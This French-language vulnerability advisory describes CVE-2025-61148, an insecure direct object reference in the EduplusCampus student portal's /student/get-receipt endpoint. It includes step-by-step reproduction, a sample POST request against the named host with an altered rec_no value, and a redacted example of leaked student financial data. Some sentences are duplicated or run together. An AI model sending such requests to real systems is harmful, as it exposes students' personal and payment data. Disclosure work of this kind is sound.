
La vulnérabilité existe dans l'API de paiement étudiant. L'application ne valide pas correctement si l'utilisateur demandant un reçu est autorisé à le voir. En modifiant le paramètre rec_no dans la requête API, un attaquant peut accéder aux reçus d'autres utilisateurs.
La vulnérabilité existe dans l'API de paiement étudiant. L'application ne valide pas correctement si l'utilisateur demandant un reçu est autorisé à le consulter. En modifiant le paramètre rec_no dans la requête API, un attaquant peut accéder aux reçus d'autres utilisateurs.
CVE ID: CVE-2025-61148
Type de vulnérabilité : Référence directe d'objet non sécurisée (IDOR)
Produit concerné : EduplusCampus
Point de terminaison concerné : /student/get-receipt
Chercheur : Vinay Sharma
Une vulnérabilité critique de type Insecure Direct Object Reference (IDOR) a été identifiée dans le portail étudiant EduplusCampus (version 3.0.1). Cette vulnérabilité permet à un utilisateur authentifié d'accéder aux données personnelles et financières sensibles d'autres étudiants en modifiant le paramètre rec_no dans la requête API.
Une exploitation réussie permet à un attaquant de récupérer :
L'application ne valide pas correctement l'autorisation de l'utilisateur demandant un reçu de paiement. Le paramètre rec_no est séquentiel ou devinable, et le serveur renvoie les détails du reçu pour le numéro demandé sans vérifier s'il appartient à l'utilisateur actuellement connecté.
/student/get-receipt.rec_no dans le corps JSON.rec_no pour un autre numéro de reçu valide (par exemple, en changeant PCUF-232025 en PCUF-231824).

POST /student/get-receipt HTTP/1.1
Host: student.edupluscampus.com
Content-Type: application/json
Authorization: Bearer <token>
{
"rec_no": "PCUF-233012"
}
### Leaked DATA Example:
{
"fullname": "REDACTED_NAME",
"rollno": "CSE2019XXX",
"component_total_amount": 55000.0,
"trans_list": [
{
"date": "21-Oct-2024",
"mode": "Online",
"amount": 55000.0,
"tid": "42951XXXX"
}
]
}